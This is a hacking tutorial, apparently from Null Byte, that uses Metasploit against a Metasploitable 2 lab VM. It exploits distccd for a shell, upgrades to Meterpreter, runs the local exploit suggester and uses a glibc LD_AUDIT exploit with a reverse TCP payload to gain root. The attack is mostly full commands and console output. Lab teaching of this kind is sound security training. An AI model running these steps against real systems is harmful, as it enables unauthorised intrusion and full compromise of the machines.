So you've managed to get a shell on the target, but you only have measly low-level privileges. Now what? Privilege escalation is a vast field and can be one of the most rewarding yet frustrating phases of an attack. We could go the manual route, but like always, Metasploit makes it easy to perform local privilege escalation and get root with its exploit suggester module.
To run through the process, we're using Kali Linux as the attacking machine and Metasploitable 2 as the target. You can set up or use a similar pentesting lab — or the same one — to follow along with the guide below.
Step 1: Get Session on Target
The first thing we need to do is get a session with low privileges on the target. We can easily do this with Metasploit. Type msfconsole in the terminal to launch it.
~$ msfconsole
[-] ***rting the Metasploit Framework console...\
[-] * WARNING: No database support: No database YAML file
[-] ***
.,,. .
.\$$$$$L..,,==aaccaacc%#s$b. d8, d8P
d8P #$$$$$$$$$$$$$$$$$$$$$$$$$$$b. `BP d888888p
d888888P '7$$$$\""""''^^`` .7$$$|D*"'``` ?88'
d8bd8b.d8p d8888b ?88' d888b8b _.os#$|8*"` d8P ?8b 88P
88P`?P'?P d8b_,dP 88P d8P' ?88 .oaS###S*"` d8P d8888b $whi?88b 88b
d88 d8 ?8 88b 88b 88b ,88b .osS$$$$*" ?88,.d88b, d88 d8P' ?88 88P `?8b
d88' d88b 8b`?8888P'`?8b`?88P'.aS$$$$Q*"` `?88' ?88 ?88 88b d88 d88
.a#$$$$$$"` 88b d8P 88b`?8888P'
,s$$$$$$$"` 888888P' 88n _.,,,ass;:
.a$$$$$$$P` d88P' .,.ass%#S$$$$$$$$$$$$$$'
.a$###$$$P` _.,,-aqsc#SS$$$$$$$$$$$$$$$$$$$$$$$$$$'
,a$$###$$P` _.,-ass#S$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$####SSSS'
.a$$$$$$$$$$SSS$$$$$$$$$$$$$$$$$$$$$$$$$$$$SS##==--""''^^/$$$$$$'
_______________________________________________________________ ,&$$$$$$'_____
ll&&$$$$'
.;;lll&&&&'
...;;lllll&'
......;;;llll;;;....
` ......;;;;... . .
=[ metasploit v5.0.20-dev ]
+ -- --=[ 1886 exploits - 1065 auxiliary - 328 post ]
+ -- --=[ 546 payloads - 44 encoders - 10 nops ]
+ -- --=[ 2 evasion ]
msf5 >
Metasploitable contains a vulnerable service called distccd, which is used to distribute program compilation across multiple systems, speeding things up by taking advantage of combined processor power. Unfortunately, this version of the program allows a remote attacker to execute arbitrary commands on the server.
We can search for the exploit using the search command:
msf5 > search distcc
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/misc/distcc_exec 2002-02-01 excellent Yes DistCC Daemon Command Execution
To load the module, type use followed by the full path of the module:
msf5 > use exploit/unix/misc/distcc_exec
We can now see the available settings with the options command:
msf5 exploit(unix/misc/distcc_exec) > options
Module options (exploit/unix/misc/distcc_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT 3632 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Automatic Target
It looks like we only need to set the remote host address since the remote port is already set using the default port number. Use the set command to specify the appropriate IP address of the target:
msf5 exploit(unix/misc/distcc_exec) > set rhosts 10.10.0.50
rhosts => 10.10.0.50
Now we are ready to launch the exploit . Use the run command, which is just a shorter alias for exploit:
msf5 exploit(unix/misc/distcc_exec) > run
[*] Started reverse TCP double handler on 10.10.0.1:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo sWI9yfQYbPxuIGrh;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "sWI9yfQYbPxuIGrh\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.0.1:4444 -> 10.10.0.50:58006) at 2019-11-19 11:46:02 -0500
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
We can see that a command shell was opened, and running uname -a verifies we have compromised the target.
Step 2: Upgrade to Meterpreter
To use Metasploit's local exploit suggester, we need to upgrade our basic Unix command shell to a Meterpreter session. While still in the basic command shell, press Ctrl-Z to background the session. Hit Y if it asks you to background it.
Background session 1? [y/N] y
msf5 exploit(unix/misc/distcc_exec) >
We are now dropped back to the main Metasploit prompt, and we can verify any sessions we have running in the background with the sessions command:
msf5 exploit(unix/misc/distcc_exec) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell cmd/unix 10.10.0.1:4444 -> 10.10.0.50:58006 (10.10.0.50)
The easiest way to upgrade a regular shell to a Meterpreter session is to use the -u flag followed by the session number to upgrade:
msf5 exploit(unix/misc/distcc_exec) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 10.10.0.1:4433
[*] Sending stage (985320 bytes) to 10.10.0.50
[*] Meterpreter session 2 opened (10.10.0.1:4433 -> 10.10.0.50:32979) at 2019-06-19 11:47:52 -0500
[*] Command stager progress: 100.00% (773/773 bytes)
We can see the post module that runs and a new session is opened. We can again verify this with the sessions command:
msf5 exploit(unix/misc/distcc_exec) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell cmd/unix 10.10.0.1:4444 -> 10.10.0.50:58006 (10.10.0.50)
2 meterpreter x86/linux uid=1, gid=1, euid=1, egid=1 @ metasploitable.localdomain 10.10.0.1:4433 -> 10.10.0.50:32979 (10.10.0.50)
And we can interact with our new Meterpreter session using the -i flag on the desired session:
msf5 exploit(unix/misc/distcc_exec) > sessions -i 2
[*] Starting interaction with 2...
meterpreter >
Step 3: Run Exploit Suggester
Metasploit post modules work by running on a background session, not directly in the session itself, so background session 2 (our Meterpreter shell) and return to the main prompt. We can then load the local exploit suggester using the following command:
msf5 exploit(unix/misc/distcc_exec) > use post/multi/recon/local_exploit_suggester
When we take a look at the options, we only need to specify the session we want to run this on:
msf5 post(multi/recon/local_exploit_suggester) > options
Module options (post/multi/recon/local_exploit_suggester):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
SHOWDESCRIPTION false yes Displays a detailed description for the available exploits
Simply set the session to number 2, which is our Meterpreter shell:
msf5 post(multi/recon/local_exploit_suggester) > set session 2
session => 2
And type run to kick it off:
msf5 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.0.50 - Collecting local exploits for x86/linux...
[*] 10.10.0.50 - 26 exploit checks are being tried...
[+] 10.10.0.50 - exploit/linux/local/glibc_ld_audit_dso_load_priv_esc: The target appears to be vulnerable.
[+] 10.10.0.50 - exploit/linux/local/glibc_origin_expansion_priv_esc: The target appears to be vulnerable.
[+] 10.10.0.50 - exploit/linux/local/netfilter_priv_esc_ipv4: The target appears to be vulnerable.
[*] Post module execution completed
We can see the module checks a number of local exploits and returns a few that seem viable. Awesome.
Step 4: Get Root
The final thing we need to do is use one of these exploits to get root on the system. We'll try the first one that was suggested to us. This exploit takes advantage of a vulnerability in the glibc dynamic linker, in which the LD_AUDIT environmental variable allows loading of a setuid object that ultimately runs with root privileges.
msf5 post(multi/recon/local_exploit_suggester) > use exploit/linux/local/glibc_ld_audit_dso_load_priv_esc
Looking at the options, we only need to set the session again — the default executable path will work for now:
msf5 exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > options
Module options (exploit/linux/local/glibc_ld_audit_dso_load_priv_esc):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
SUID_EXECUTABLE /bin/ping yes Path to a SUID executable
Exploit target:
Id Name
-- ----
0 Automatic
Set the session just like before:
msf5 exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > set session 2
session => 2
We can also set the payload to give us another Meterpreter session when the exploit completes:
msf5 exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
And set the appropriate listening host (the IP address of our local machine) and port:
msf5 exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > set lhost 10.10.0.1
lhost => 10.10.0.1
msf5 exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > set lport 4321
lport => 4321
Finally, type run to launch the exploit:
msf5 exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > run
[*] Started reverse TCP handler on 10.10.0.1:4321
[+] The target appears to be vulnerable
[*] Using target: Linux x86
[*] Writing '/tmp/.BlrZu4n' (1271 bytes) ...
[*] Writing '/tmp/.18qZUt' (281 bytes) ...
[*] Writing '/tmp/.DoiFwlxPt' (207 bytes) ...
[*] Launching exploit...
[*] Sending stage (985320 bytes) to 10.10.0.50
[*] Meterpreter session 3 opened (10.10.0.1:4321 -> 10.10.0.50:56950) at 2019-11-19 11:57:19 -0500
meterpreter >
We now have a new Meterpreter session on the target, and we can drop into a shell to verify we have obtained root access:
meterpreter > shell
Process 4886 created.
Channel 1 created.
id
uid=0(root) gid=0(root) groups=1(daemon)
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
Wrapping Up
In this tutorial, we learned how to use Metasploit to get a shell on the target, upgrade that shell to a Meterpreter session, and use the local exploit suggester module to ultimately get root on the system. Metasploit not only makes initial exploitation easy but the post-exploitation phase as well. In the next article, we will explore some useful post modules to quickly gather information about the target.
Cover image by Pixabay/Pexels; Screenshots by drd_/Null Byte
Comments
No Comments Exist
Be the first, drop a comment!